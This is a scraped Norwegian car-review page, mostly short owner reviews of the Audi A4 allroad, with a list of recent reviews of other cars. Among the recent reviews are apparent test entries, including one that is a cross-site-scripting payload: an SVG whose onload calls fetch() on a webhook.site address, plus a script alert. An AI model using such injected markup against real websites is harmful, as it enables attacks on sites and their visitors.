Audi >
A4 allroad > 2009-2016
Audi A4 allroad (2016)
Topp bil
Audi A4 allroad (2015)
Meget fornøyd og fantastisk 4-hjulstrekk og fin å dra henger med.
Audi A4 allroad (2015)
Veldig fornøyd med bilen på det aller meste. Kommer nok til å bytte til A6 allroad/e-tron eller annen bil på grunn av behov for mer plass.
Audi A4 allroad (2015)
Meget bra bil, men noe dyr i innkjøp og servicer.
Audi A4 allroad (2015)
Det beste med bilen er seteinnstillingane. For meg som er 190 cm høg, så har eg god nytte av uttrekkbart sete, som også kan vinkles opp og ned i forkant. Avstanden mellom sete/ratt (samt disse sine
Audi A4 allroad (2014)
Styr unna 177hk diesel. EGR og DPF ødelegger denne motor med CGL-kode. Møller og Sulland innrømmer ingen feil med disse. Noen må vel vite noe om hvorfor disse motorene drikker olje fra ca 50000 kj
Audi A4 allroad (2014)
Liker den kjempebra letet lenge etter sån bil
Audi A4 allroad (2014)
Fantastiske kjøreegenskaper og skyhøy komfort. Kjører som en personbil, og har alle fordelene til en SUV. Anbefaler 190hk diesel, 224hk bensin eller V6 245hk diesel. B&O anlegget setter prikken ove
Audi A4 allroad (2014)
God familie bil. Litt oljetørst.
Audi A4 allroad (2014)
En super bil, fin å kjøre, og god kvalitet.
Audi A4 allroad (2014)
Bil jeg anbefaler på det sterkeste. Høy bakkeklaring, god beskyttelse av skjermbuer og kanaler, gjør at bilen tåler godt grusveier. Blir ikke sandblåst.
Audi A4 allroad (2013)
7,5 av 10 fordi jeg digger bilen på tross av viskere og vann. Savner 5 cm ekstra bakkeklaring og sperre, men da må man visst ha Japansk bil.
Audi A4 allroad (2013)
Det ble Audi igjen, men el denne gangen
Audi A4 allroad (2013)
Lagd av papp
Audi A4 allroad (2013)
Liker bilen veldig godt. Blir Audi neste gang også.
Audi A4 allroad (2013)
Feilfri siden ny
Audi A4 allroad (2013)
sammenlign med tilsvarende biler i samme pris, er dette beste valget
Audi A4 allroad (2013)
Fin å kjøre, rask, praktisk og feilfri så langt. Første bil jeg har hatt som nå har gått over 80.000 km uten å skifte bremsebelegg... Solgte denne etter 96000 km, ingen feil. Klosser og skiver
Audi A4 allroad (2013)
God og sikker bil å kjøre, veldig fornøyd
Audi A4 allroad (2013)
Svært kald motor ved vinterkjøring drar ned helhetsinntrykket
Audi A4 allroad (2013)
God bil, meget driftssikker, ingen feil første 4 år.
Audi A4 allroad (2012)
Kjempefornøyd med bilen! Ruster ikke som vanlig A4
Audi A4 allroad (2012)
Utrolig linje lekker bil
Audi A4 allroad (2011)
Fin bil å se på, godt firehjulstrekksystem. Plass til store hjul, gjør seg estetisk.. Ellers virker den godt sammenskrudd, kjørt vel 35000 km nå (gått snart 220 000) uten annet en bytte av sli
Audi A4 allroad (2011)
Var veldig fornøyd helt til høytrykkspumpa røyk på ferietur og Møller villa ha 151.000,- for å fikse opp. Vet ikke hvorfor pumpa røyk, men det har tydeligvis vært problemer med dem. Siden den
Audi A4 allroad (2011)
God og relativt driftsikker bil. God på vinterføre. Ikke allverdens plass innvendig. Pluss er da at den er rimelig grei å parkere på stadig trangere parkeringsplasser. Stort sett fornøyd med møl
Audi A4 allroad (2011)
God og rimelig i drift.selv om bilen har stor motor
Audi A4 allroad (2010)
Super god bil å både sitte i å kjøre. Lite støy uten ifra. Fantastisk fin å se på. Møller må roe ned prisene sine litt
Audi A4 allroad (2010)
Sporty, praktisk og behagelig bil. Romslig liten A4 med 4x4 som får deg fram overalt med rett dekk. Eneste minuset er rep og vedlikehold er dyrt på disse! Vær OBS på høytrykkspumpa, dette er en s
Audi A4 allroad (2010)
Ok transportfarkost, men kjedelig og med unødvendig høye service- og vedlikeholdskostnader. Bytter til elbil. Ikke Audi.
Audi A4 allroad (2010)
Pærføkt bil til mitt bruk. Høg bakkeklaring og stasjonsvogn. Grei plass til 4 voksne.
Audi A4 allroad (2010)
En veldig god bil, savner egentlig ingenting med denne bilen. Bytter vanligvis bil rundt 100.000 km, men denne har gått 120.000 nå og jeg kommer nok til å ha den en god stund til.
Audi A4 allroad (2010)
Meget fornøyd. Ingen lyder. Svært kompakt.
Renault 5 E-Tech (2025)
Dette er virkelig en bil jeg anbefaler. Årets bil i Europa og Årets bil i Norge, med god grunn. Veldig kult retro-design. Legger til at Renault også hadde årets bil i Europa i 2024 med Scenic E-Te
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km